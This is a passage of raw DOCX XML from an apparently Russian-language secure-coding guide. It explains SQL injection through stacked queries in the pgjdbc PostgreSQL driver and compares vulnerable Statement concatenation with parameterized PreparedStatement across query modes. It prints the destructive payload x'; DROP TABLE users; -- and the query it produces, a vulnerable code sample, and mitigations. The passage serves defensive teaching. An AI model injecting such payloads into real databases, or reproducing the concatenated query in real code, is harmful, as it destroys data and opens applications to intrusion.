          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prepareThreshold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default 5) — после N исполнений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становится server-side prepared statement; для нашей темы не меняет ничего, потому что extended-режим уже на первом исполнении.</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String name = request.getParameter("name");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement stmt = conn.createStatement();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ResultSet rs = stmt.executeQuery(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, email FROM users WHERE name = '" + name + "'");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкатенация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement.executeQuery()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Statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не имеет фазы Bind — pgjdbc отправляет строку как simple query.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String name = request.getParameter("name");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PreparedStatement ps = conn.prepareStatement(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, email FROM users WHERE name = ?");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ps.setString(1, name);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ResultSet rs = ps.executeQuery();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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setString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. По умолчанию (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode=extended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) уходит через Parse/Bind/Execute, значение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приходит на сервер как Bind-аргумент.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</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100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'; DROP TABLE users; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 1: Statement.execute() — simple, всегда уязвим.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="14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SELECT id, email FROM users WHERE name = 'x'; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Оба statement-а исполняются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">executeQuery()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вернёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ResultSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от первого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(JDBC: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getMoreResults()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даст доступ к последующим командам, но обычно не вызывается).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 2: PreparedStatement + extended (default) — Parse error на `;` в SQL-тексте.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если разработчик правильно использует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setString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — payload едет как Bind-параметр:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind:    $1 = 'x''; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute: 0 rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если разработчик случайно склеил SQL-текст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PreparedStatement ps = conn.prepareStatement(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id; DROP TABLE users");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">org.postgresql.util.PSQLException: ERROR: cannot insert multiple commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 3: PreparedStatement + `preferQueryMode=simple` — частичная защита.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JDBC URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">jdbc:postgresql://host:5432/db?preferQueryMode=simple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С таким URL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setString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> остаётся безопасным благодаря </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">client-side экранированию pgjdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (аналогично psycopg2). Но конкатенация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prepareStatement(sql)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> теперь проходит как simple query — стакинг исполнится. То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> снимает серверную защиту, оставляя только клиентскую — и она работает только для значений-через-</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 для всей SQL-строки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что отличает pgjdbc от Python-драйверов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Два API на одном connection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Statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (всегда уязвим к stacked queries при конкатенации) vs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(безопасен по умолчанию). В Python-драйверах нет такого разделения — там один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 разными формами вызова.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`preferQueryMode` — connection-wide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, задаётся в URL. Невозможно «локально» переключить режим для одного запроса. Включение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> влияет на всё приложение.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Server-side prepared statements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> включаются после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prepareThreshold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполнений —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становится named prepared statement на сервере. Это усиливает гарантию extended-path, но не меняет картину для stacked queries.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`getMoreResults()` API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JDBC позволяет приложению явно получать результаты нескольких statement-ов после удачного стакинга. Это значит, что разработчик, использующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement.execute()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для административных multi-statement скриптов, может видеть все результаты — стакинг здесь не «прячется», как в asyncpg.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations специфичные для драйвера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Никогда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не передавать пользовательский ввод в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement.execute*()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для legitimate multi-statement миграций — отдельный admin-путь, не из HTTP-обработчиков. В коде судьи: </w:t>
      </w:r>
